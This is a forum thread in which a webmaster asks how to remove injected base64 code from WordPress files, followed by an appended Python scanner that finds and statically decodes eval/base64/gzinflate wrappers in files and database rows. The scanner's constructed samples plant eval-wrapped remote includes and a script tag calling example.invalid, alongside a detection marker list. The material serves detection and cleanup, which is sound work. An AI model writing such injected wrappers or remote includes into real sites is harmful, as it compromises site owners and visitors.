Removing malicious lines of base 64 code

Malware in files, what to do, how to remove?

skibum

5:58 pm on Sep 30, 2010 (gmt 0)

So in a hosting account with a few WordPress installations, there are several files that have been injected with malicious code. The web host says I will need to remove the malicious lines of base64 code and secure the account against future attacks. There is a list of probably at least 200 files. Many are in wp-admin, wp-includes, wp-content/themes and a few others I created trying to learn PHP/MySQL and understand all this stuff better.

Any suggestions on what to do or how to remedy this? This all might as well be written in Chinese as I have no idea what to do. I looked at a few of the files I created and nothing jumps out at me as being out of place, so I can't see any "malicious lines of base64 code".

lammert

2:57 am on Oct 1, 2010 (gmt 0)

These lines shouldn't be too difficult to recognize. They all start with something like

eval(base64_decode('some string...


The more sophisticated versions use zip compression:

eval(stripslashes(gzinflate(base64_decode('some string ...


I had them a few months ago in a WordPress installation of a non-profit organization I host for. The lines were there right from the beginning--even before the site went live--and I therefore don't think they were injected, but part of a free theme they found somewhere. I didn't analyze it fully, but it seemed that part of the functionality of the theme was coming from an external server and that server delivered the malicious payload. The download code from that remote server was base64 encoded, to make it difficult to identify for the average website builder.

Rather than cleaning up the mess, I just disabled the use of WordPress, removed all files and pushed the user in the direction of another CMS.

phranque

7:24 am on Oct 5, 2010 (gmt 0)

you have to figure out where the vulnerability is to ultimately solve the problem.
for example, it could be that someone obtained your login credentials, or that another account on the shared server provided a back door, or that you installed a theme containing some "bad stuff", or that WP or a plugin has a vulnerability.

here are a few WebmasterWorld posts that may provide some clues.

Website HACKED - help!:
http://www.webmasterworld.com/webmaster/4042154.htm [webmasterworld.com]

I have a site hijacking my wordpress - can you help?:
http://www.webmasterworld.com/content_management/3830507.htm [webmasterworld.com]

30 day ban for cloaked outgoing links due to PHP hack:
http://www.webmasterworld.com/google/3823009.htm [webmasterworld.com]

skibum

7:44 am on Oct 5, 2010 (gmt 0)

Thanks! I was looking at the files noted by the host as having base64 code in them and could not find any strange code in a handful that were supposedly infected. I doubt I'll ever be able to figure out where the backdoor is if changing login credentials doesn't work, but those threads add a few more things to run through to try to clean things up.

phranque

9:32 am on Oct 5, 2010 (gmt 0)

as was mentioned in one thread the payload could be dynamically included from an external server.
also note that the database may contain the encoded javascript and the php script is assembling that content on the fly.
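lammert's post above names the two wrapper shapes (eval(base64_decode('...')) and eval(stripslashes(gzinflate(base64_decode('...'))))), and phranque's last post adds that the encoded blob may live in a database row rather than in a file. The scanner below is an added example written for this thread; it is not code from the thread, from the host, or from WordPress. It finds both wrapper shapes in a file tree and undoes the wrapper chain statically (base64, raw DEFLATE for gzinflate, backslash removal for stripslashes) without executing anything, and it flags bare base64 runs in post and option rows that decode to a script tag or an include. Everything it scans is constructed for the demo: the theme files, the payload include('http://example.invalid/c.txt'), the widget option, and an in-memory SQLite stand-in for the MySQL wp_posts/wp_options tables. The scanned extensions and the MARKERS list are my own choices, not a standard.

```python
import base64
import re
import sqlite3
import tempfile
import zlib
from pathlib import Path

# eval() wrapped in the PHP decoder calls named in the thread, applied to a quoted literal.
# Group 1 = wrapper chain (outermost first), group 3 = the literal.
WRAP_RE = re.compile(
    r"""eval\s*\(\s*((?:(?:stripslashes|gzinflate|base64_decode)\s*\(\s*)+)(['"])([A-Za-z0-9+/=\s]*)\2""",
    re.IGNORECASE)
# Bare base64 run of 40+ chars: what a DB row holds when PHP adds the eval()/<script> wrapper later.
BLOB_RE = re.compile(r"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{40,}={0,2})(?![A-Za-z0-9+/=])")
MARKERS = ("<script", "<iframe", "eval(", "document.write", "include(", "fwrite(")  # assumed list


def decode_chain(funcs, literal):
    """Undo the wrapper chain innermost-first, statically: nothing is executed."""
    data = literal.encode()
    for fn in reversed(funcs):
        if fn == "base64_decode":
            data = base64.b64decode(data)            # stray whitespace is ignored
        elif fn == "gzinflate":
            data = zlib.decompress(data, -15)        # PHP gzinflate = raw DEFLATE, no header
        elif fn == "stripslashes":
            data = re.sub(rb"\\(.)", rb"\1", data, flags=re.S)  # drop the escaping backslash
    return data.decode("utf-8", "replace")


def scan_text(text):
    """Return [(kind, wrapper, decoded_payload)] for each suspicious construct in text."""
    findings, covered = [], []
    for m in WRAP_RE.finditer(text):
        funcs = re.findall(r"[a-z0-9_]+", m.group(1).lower())
        try:
            payload = decode_chain(funcs, m.group(3))
        except (ValueError, zlib.error) as exc:          # bad base64 or deflate stream
            payload = f"<undecodable: {exc}>"
        findings.append(("eval-wrapper", "(".join(funcs) + "(", payload))
        covered.append(m.span())
    for m in BLOB_RE.finditer(text):
        if any(a <= m.start() and m.end() <= b for a, b in covered):
            continue                                     # already reported as a wrapper
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            continue                                     # not valid base64 after all
        if any(k in decoded.lower() for k in MARKERS):
            findings.append(("base64-blob", "base64_decode(", decoded))
    return findings


def scan_tree(root):
    """Scan PHP/JS/HTML files under root; returns {relative_path: findings}."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in {".php", ".js", ".html", ".htm"}:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report


def scan_db(conn):
    """Scan post bodies and option values, the WordPress tables that get injected."""
    report = {}
    for table, sql in (("wp_posts", "SELECT ID, post_content FROM wp_posts"),
                       ("wp_options", "SELECT option_id, option_value FROM wp_options")):
        for row_id, content in conn.execute(sql):
            hits = scan_text(content or "")
            if hits:
                report[f"{table}#{row_id}"] = hits
    return report


def build_samples(root, conn):
    """Constructed data: a theme with two injected files and a WordPress-shaped SQLite DB."""
    theme = Path(root) / "wp-content" / "themes" / "demo"
    theme.mkdir(parents=True)
    payload = "include('http://example.invalid/c.txt');"   # constructed remote include
    plain = base64.b64encode(payload.encode()).decode()
    co = zlib.compressobj(wbits=-15)                        # raw DEFLATE, as gzinflate expects
    deflated = co.compress(payload.replace("'", "\\'").encode()) + co.flush()
    layered = base64.b64encode(deflated).decode()
    (theme / "header.php").write_text(f"<?php eval(base64_decode('{plain}')); ?>\n<html>\n")
    (theme / "functions.php").write_text(
        "<?php\nfunction demo_setup() { add_theme_support('title-tag'); }\n"
        f"eval(stripslashes(gzinflate(base64_decode('{layered}'))));\n")
    conn.executescript("CREATE TABLE wp_posts (ID INTEGER, post_content TEXT);"
                       "CREATE TABLE wp_options (option_id INTEGER, option_name TEXT, option_value TEXT);")
    conn.execute("INSERT INTO wp_posts VALUES (1, 'Welcome to the demo site.')")
    conn.execute("INSERT INTO wp_options VALUES (1, 'siteurl', 'http://example.invalid')")
    script = base64.b64encode(b'<script src="http://example.invalid/j.js"></script>').decode()
    conn.execute("INSERT INTO wp_options VALUES (2, 'widget_text', ?)",
                 (f'a:1:{{s:4:"text";s:{len(script)}:"{script}";}}',))


def demo():
    """Scan the constructed samples; returns (file_report, db_report)."""
    with tempfile.TemporaryDirectory() as tmp, sqlite3.connect(":memory:") as conn:
        build_samples(tmp, conn)
        return scan_tree(tmp), scan_db(conn)


if __name__ == "__main__":
    for report in demo():
        print(report)
```

On a real account, point scan_tree at the document root and feed scan_db a connection to the live MySQL database instead of the SQLite stand-in. Decoding is static, so reading a hostile file never runs it, and the decoded payload is what tells you what the injection did: here it is a remote include, which is exactly the case from the thread where the local file looks almost clean and the real code arrives from another server at request time. Treat a hit as a lead to investigate, not as proof on its own, and compare any flagged core file against a fresh copy of the same WordPress release.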